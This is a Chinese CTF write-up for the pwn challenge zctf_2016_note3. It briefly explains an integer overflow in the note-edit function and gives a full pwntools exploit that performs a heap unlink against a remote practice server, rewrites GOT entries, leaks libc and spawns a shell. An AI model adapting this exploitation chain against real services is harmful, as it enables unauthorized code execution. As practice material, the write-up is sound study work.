整数溢出unlink

zctf_2016_note3

整数溢出的unlink,在edit功能里面造成了整数溢出

,这个题目的排布也很神奇,原本在heap[-1]处就存在一个堆指针。。。。

所以溢出成-1大小是无限的

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#coding:utf8
from pwn import *

#r = process('./zctf_2016_note3')
r = remote('node4.buuoj.cn',26250)
elf = ELF('./zctf_2016_note3')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
atoi_got = elf.got['atoi']
free_got = elf.got['free']
puts_plt = elf.plt['puts']
heap_0_ptr_addr = 0x00000000006020C8

def add(size,content):
r.sendlineafter('option--->>','1')
r.sendlineafter('(less than 1024)',str(size))
r.sendafter('content:',content[0:size-1])

def edit(index,content):
r.sendlineafter('option--->>','3')
r.sendlineafter('Input the id of the note:',str(index))
r.sendafter('Input the new content:',content)

def delete(index):
r.sendlineafter('option--->>','4')
r.sendlineafter('Input the id of the note:',str(index))

#0
add(0x100,'a'*0x100)
#1
add(0x100,'b'*0x100)
#2
add(0x10,'c'*0x10)
#3
add(0x10,'c'*0x10)
#4
add(0x10,'c'*0x10)
#5
add(0x10,'c'*0x10)
#6
add(0x10,'c'*0x10)
#让heaps[-1]为heaps[0]
#gdb.attach(sh)
delete(0)
add(0x100,'a'*0x100)
#gdb.attach(sh)

#现在,通过让index为-1,就可以溢出chunk0
payload = p64(0) + p64(0x101)
payload += p64(heap_0_ptr_addr - 0x18) + p64(heap_0_ptr_addr - 0x10)
payload = payload.ljust(0x100,'a')
payload += p64(0x100) + p64(0x110)
payload += '\n'
edit(0x8000000000000000 - 0x10000000000000000,payload)
#unlink
delete(1)
edit(0,p64(0) * 3 + p64(free_got) + p64(atoi_got) *2 + '\n')
#修改free的got表为puts的plt表
edit(0,p64(puts_plt)[0:7] + '\n')
#泄露atoi地址
delete(1)
r.recvuntil('\n')
atoi_addr = u64(r.recv(6).ljust(8,'\x00'))
libc_base = atoi_addr - libc.sym['atoi']
system_addr = libc_base + libc.sym['system']
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
#修改atoi的got表为system地址
edit(2,p64(system_addr)[0:7] + '\n')
#getshell
r.sendlineafter('option--->>','/bin/sh\x00')

r.interactive()
  • Copyright: Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.

扫一扫,分享到微信

微信分享二维码
  • Copyrights © 2015-2022 H.greed
  • Visitors: | Views:

请我喝杯咖啡吧~

支付宝
微信